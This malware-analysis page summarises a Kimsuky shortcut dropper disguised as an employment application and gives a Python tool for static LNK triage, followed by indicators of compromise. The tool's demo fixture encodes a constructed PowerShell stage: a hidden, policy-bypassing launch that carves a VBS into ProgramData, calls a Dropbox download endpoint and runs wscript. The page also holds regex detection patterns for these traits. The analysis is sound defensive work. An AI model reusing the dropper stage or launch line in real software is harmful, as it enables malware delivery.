Malware created by the North Korean hacking group Kimsuky: 근로신청서 관련의 건.docx.lnk (2024.7.9) (the lure file name translates roughly as "Regarding the employment application.docx.lnk")

2024-07-17 Sakai Kimsuky malware disguised as an employment application document shortcut

https://wezard4u.tistory.com/429233


The Korean source attributes a malicious Windows shortcut (.lnk), disguised as an employment application document, to Kimsuky. Opening the shortcut launches obfuscated PowerShell with the execution policy bypassed; the script decodes Base64 content embedded in its own command line, searches the file system for a shortcut file matching the lure, and extracts additional data from that LNK file (the shortcut carries the next stage in its own bytes). Execution writes a VBS file and temporary files under ProgramData and runs the VBS with wscript.exe; network activity goes to Dropbox API upload and download endpoints. The report gives hashes for the lure and notes antivirus detections for the LNK dropper.
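The behaviour summarised above is what a static triage of the shortcut should surface: the COMMAND_LINE_ARGUMENTS string inside the ShellLink structure, the Base64 blob it decodes, and any payload appended after the end of the structure (the "additional data" the script extracts from the LNK). The following Python is an added example written for this page, not code from the original post or from the blog it summarises. It parses the MS-SHLLINK layout (header, optional ID list and LinkInfo, StringData, ExtraData blocks), decodes -EncodedCommand style Base64 as UTF-16LE, and flags the indicators the report lists. The sample shortcut, its PowerShell stage, the indicator labels and the Dropbox URL path used in it are constructed for the demonstration; they are not the real lure's values. It goes slightly beyond the page by also reporting how many bytes trail the structure, which is the carving offset an analyst needs.

```python
"""Static triage of a Windows .lnk dropper (added example; constructed sample)."""
import base64
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-...-46, LE
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# (regex over lower-cased text, label): run over the raw arguments and over
# every Base64 blob decoded from them. Labels are this example's own names.
INDICATORS = (
    (r"-(?:ep|executionpolicy)\s+bypass", "execution-policy bypass"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/]{16,}", "encoded command"),
    (r"frombase64string", "inline Base64 decode"),
    (r"\.lnk\b", "searches for .lnk files"),
    (r"programdata", "writes under ProgramData"),
    (r"\bwscript(?:\.exe)?\b", "runs script with wscript.exe"),
    (r"dropboxapi\.com", "Dropbox API traffic"),
)


def parse_lnk(data):
    """Walk the ShellLink structure; return StringData, end offset and trailing bytes."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize covers the whole block
        off += struct.unpack_from("<I", data, off)[0]
    unicode_ = bool(flags & IS_UNICODE)
    strings = {}
    for flag, name in STRING_FIELDS:             # CountCharacters (2) + chars, no terminator
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode_ else count
            raw = data[off:off + nbytes]
            strings[name] = raw.decode("utf-16-le") if unicode_ else raw.decode("cp1252")
            off += nbytes
    while off + 4 <= len(data):                  # ExtraData blocks until TerminalBlock (<4)
        size = struct.unpack_from("<I", data, off)[0]
        if size < 4:
            off += 4
            break
        off += size
    return {"flags": flags, "strings": strings, "end": off, "trailing": data[off:]}


def _printable(s):
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_base64_blobs(text):
    """Decode every long Base64 run; PowerShell -enc payloads are UTF-16LE."""
    out = []
    for m in re.finditer(r"[A-Za-z0-9+/]{32,}={0,2}", text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:                       # binascii.Error is a ValueError
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _printable(s):
                out.append(s)
                break
    return out


def analyze_lnk(data):
    info = parse_lnk(data)
    args = info["strings"].get("arguments", "")
    decoded = decode_base64_blobs(args)
    haystack = "\n".join([args, *decoded]).lower()
    hits = [label for pat, label in INDICATORS if re.search(pat, haystack)]
    return {"relative_path": info["strings"].get("relative_path", ""), "arguments": args,
            "decoded": decoded, "indicators": hits, "structure_end": info["end"],
            "trailing_bytes": len(info["trailing"]), "trailing": info["trailing"]}


def build_lnk(relative_path, arguments, trailing=b""):
    """Build a minimal Unicode ShellLink (constructed demo input, not the real file)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)   # ShowCommand 7 = minimised
    def sd(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments) + b"\x00\x00\x00\x00" + trailing


# Constructed stand-in for the lure's PowerShell stage (not the real script).
SCRIPT = ("$l=Get-ChildItem $env:USERPROFILE -Recurse -Filter *.lnk|?{$_.Length -eq 1234};"
          "$b=[IO.File]::ReadAllBytes($l.FullName);"
          "$v=\"$env:ProgramData\\svc.vbs\";[IO.File]::WriteAllBytes($v,$b[1111..1233]);"
          "$c=[Convert]::FromBase64String('aGVsbG8=');"
          "Invoke-RestMethod https://content.dropboxapi.com/2/files/download;"
          "wscript.exe $v")
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
PAYLOAD = b"' constructed stand-in for the embedded VBS stage\r\n"
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe",
                       "/c powershell.exe -ep bypass -w hidden -enc " + ENC, PAYLOAD)
BENIGN_LNK = build_lnk("..\\notepad.exe", "C:\\notes\\todo.txt")

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        r = analyze_lnk(blob)
        print(name, r["indicators"], "trailing bytes:", r["trailing_bytes"])
```

On a real file run `analyze_lnk(open(path, "rb").read())`; `structure_end` is where the ShellLink ends and `trailing` is everything after it, which is the region to carve and hash separately when a shortcut is far larger than its visible target and arguments justify.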

Indicators of Compromise

Type  Value                                    First seen  Last seen
URL   https://content.dropboxapi.com/…         2020-03-25  2025-09-03
URL   https://content.dropboxapi.com/…         2018-09-21  2025-09-03
HASH  21d12dc7f08752293847af6ed19df0e3 (MD5)   2024-07-17  2024-09-05
HASH  5074647737b8b996b597c1719b571cc…         2024-07-17  2024-07-17
HASH  e7e73a5133cd61c077f85c44e9efeb8…         2024-07-17  2024-07-17
